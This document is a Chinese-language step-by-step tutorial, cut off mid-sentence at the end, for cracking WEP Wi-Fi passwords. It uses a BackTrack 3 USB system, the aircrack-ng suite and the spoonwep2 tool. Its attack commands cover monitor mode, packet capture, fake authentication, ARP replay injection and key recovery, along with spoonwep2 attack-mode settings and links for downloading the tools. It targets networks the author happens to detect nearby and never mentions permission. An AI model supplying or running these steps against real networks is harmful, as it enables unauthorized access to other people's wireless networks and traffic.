教程下載地址:http://www.xpgod.com/soft/1457.html
一、准備篇
1、一個有可破解無線信號的環境。如我在家隨便搜索出來的信號。
2、帶無線網卡的電腦一台(筆記本台式機均可,只要無線網卡兼容BT3),我用 的是三星NC10的上網本。
3、2G以上優盤一個(我用的是kingston 8G 的)
4、搜索 下載BT3,約800兆。或BT4,約900兆。
BT3下載地址: http://f1.soft-3h0jae9frd1g.chnxp.com.cn/BACKTRACK3final_usb.rar
BT4 下載地址: http://ftp.belnet.be/mirror/backtrack/bt4-beta.iso
注:BT3 全稱BackTrack3,與我們常說的bt下載是完全不同的概念。以我理解就是集成了一些計算機安全軟件的linux系統。正是由於它的出世和不斷普 及,使得破解可讓普通用戶輕易言之。
5、搜索下載spoonwep2中文包。地址: http://gd.qiannao.com:8080/servlet/FileDownload?filename=//yinghu/上 傳分享/2008/11/13/中文包_spoonwep2.rar&vid=0
注:spoonwep2就是我們的破 解軟件,一個非常強悍的圖形化破解WEP無線網絡密碼的工具。
二、安裝篇
1、將優盤格式化,配置如下圖,唯一要注意文件系統選為FAT32就可以了。
2、將剛才下載完成的bt3解壓縮,復制到優盤,完成後會看到優盤目錄下有兩個文件夾,一個boot 一個BT3。如下圖:
3、開始安裝bt3系統。
點擊開始-運行,輸入 CMD, 然後回車,進入命令行模式 。
首先輸入你優盤的盤符,我這裡是h盤,輸入h: 然後回車,接下來輸入 cd boot 回車,進入到boot文件夾下,最後 bootinst.bat 回車,就會開始安裝BT3,如下圖:
然後安裝會出現一個提示畫面,我們別去管它,直接按任意鍵繼續
按任意鍵後,電腦會自動設置引導記錄,整個過程大概10秒左右。出現下面畫面 後,此優盤就可以引導系統進去bt3了。
4、集成 spoonwep2軟件。
首先把我們先前下載的spoonwep2解壓縮,裡面是六個擴展名為lzm的文件,將這六個文件復制 到優盤\bt3\modules文件夾下,如圖:
這樣我們的 bt3系統已經集成安裝完畢了,可以動手破解了。
三 破解篇
1、將安裝好系統的優盤插入電腦,重啟後進入bios,設置優盤為電腦第一啟動順序。(這個如果沒設置過,可以問一下其他人,或者在網上找找設置方法,每 台電腦進入bios的方法也不同,如開機按F2,Del,F1等等)
2、設置優盤啟動後,電腦會自動帶入我們進入bt3操作系 統(如果出現界面選擇,你要選擇vesa mode),系統界面是這樣的(漂亮吧):
開始輸入指令
ifconfig -a 查看網卡(之後只出現eth0和lo則表示你的無線網卡沒有被識別,要是有eth0、wlan、lo等則表示可以)
如果出現wlan網卡(本機無線網卡),則進行
ifconfig -a wlan0 up(此命令用於加載網卡,有的時候直接執行spoonwep是不可以的,需要加載)
然後執行ln -fs bash/bin/sh
再執行 ls -all /bin/sh(顯示bash為成功,顯示dash為失敗)
現在開始破解
1.在shell窗口中輸入 ifconfig 命令 ,出現如下信息:
lo no wireless extensions.
eth0 no wireless extensions.
eth1 IEEE 802.11g ESSID:"" Nickname:""
Mode:(......)Frequency:2.452 GHz Access Point: 00:0F:B5:88:AC:82
Bit Rate:0 kb/s Tx-Power:18 dBm Sensitivity=0/3
Retry:off RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off
Link Quality=0/94 Signal level=-95 dBm Noise level=-95 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0
2.找出你的無線網卡名字,我這裡是 eth1.再啟動你的網卡為Moniter模式(輸入airmon-ng start eth1 11)。再輸入 ifconfig 命令 ,返回如下信息:
lo no wireless extensions.
eth0 no wireless extensions.
eth1 IEEE 802.11g ESSID:"" Nickname:""
Mode:Monitor Frequency:2.452 GHz Access Point: 00:0F:B5:88:AC:82
Bit Rate:0 kb/s Tx-Power:18 dBm Sensitivity=0/3
Retry:off RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off
Link Quality=0/94 Signal level=-95 dBm Noise level=-95 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0
3. 輸入命令 airodump-ng -c 11 --bssid 00:1A:01:8D:C3:B2 -w outputs eth1.
命令中的11 表示要破解的頻道號,bssid後面的數字表示破解目標的MAC物理地址,outputs表示要生成的包的名稱。回車運行。
4.再開一個 shell 輸入 aireplay-ng -1 0 -e targetnet -a 00:1A:01:8D:C3:B2 -h 00:A1:C1:D8:A5:B6 eth1
其中“targetnet”表示破解目標網絡名,00:1A:01:8D:C3:B2前面已解釋過是指目標MAC物理地址,00:A1:C1:D8:A5:B6表示本機網卡MAC物理地址
5.再開一個 shell 輸入 aireplay-ng -3 -b 00:1A:01:8D:C3:B2 -h 00:A1:C1:D8:A5:B6 eth1
獲取更多的數據包。
6.返回數據量到1萬的時候就可以破解了。再開一個shell輸入 aircrack-ng -z -b 00:1A:01:8D:C3:B2 outputs.cap 進行破解。如果破解不成功,讓它繼續抓包,直到破解。
3、啟動spoonwep2軟件
開啟一個命令窗口,輸入:spoonwep 回車後10秒鐘左右彈出spoonwep2程序:
NET CARD 網卡接口 選擇 WLAN0
DRIVER 驅動 選擇 NORMAL
MODE 模式 選擇 UNKNOWN VICTIM
點 NEXT 轉到 VICTIMS DISCOVERY 窗口
CHAN HOPPING 是全頻段掃描 (建議選擇: FIXED CHAN,有針對性的掃描)
點擊右上角 LAUNCH 按鈕 (點完後會變成 ABORT ) 這時會彈出抓包窗口,可作為參考,也可不用理會。20秒
首先點擊左上角下拉菜單選擇CHAN HOPPING→LAUNCH(點完後會變成ABORT )→會開始自動執行
注:
ESSID 路由廣播名稱
MAC 路由的地址
CHAN 使用的頻道
POW 信號強度
DATA 數據包
CLIS 空白代表無客戶端,打鉤則代表有客戶端;
(備注:無線網卡搜索一陣子,被搜索到的無線信號的SSID將會列表顯示。如果某加密無線信號的CLIS方框內有“勾”,表示該無線信號此刻托有客戶端,這時破解會高效、快速一些。如果你選中了這樣的的信號,緊接著窗口的下方會顯示出客戶端代表,你應該把下方的客戶端也選中1想參與破解。不要迷信一定要帶客戶端才能破解,沒有客戶端的AP也可以破解,裡路上POW值大於18的都可以破解的。)
有客戶端模式比無客戶端模式成功率要高,選中打算破解的路由,下面會顯示出當前所有鏈接到這個路由的客戶端,選擇一個POWER PACKETS都比較高的客戶端。
然後點 SELECTION OK 轉到 ATTACK PANEL 窗口
第一個下拉菜單有4個選項,後面3個都可作為無客戶端攻擊模式,其中 :
ARP REPLAY ATTACK (有客戶端時用)
P0841 REPLAY ATTACK (次次選)
CHOPCHOP & FORGEATTACK (次選)
FRAGMENTATION & FORGE ATTACK (首選)
第二個下拉菜單有3個選項,其中:
??? LENGTH (不指定加密位數,首選)
128 BITS LENGTH (指定128位加密,次次選)
64 BITS LENGTH (指定64位加密,次選)
兩個下拉菜單右邊的 Inj Rate 是每秒發包數量,選默認的600即可。
選擇好兩個下拉菜單,點擊左邊 LAUNCH 按鈕 開始自動破解,破解速度和信號強度成正比。
最下面的WEP KEY就是破解出來的密碼,無需輸入冒號。
注:有客戶端模式比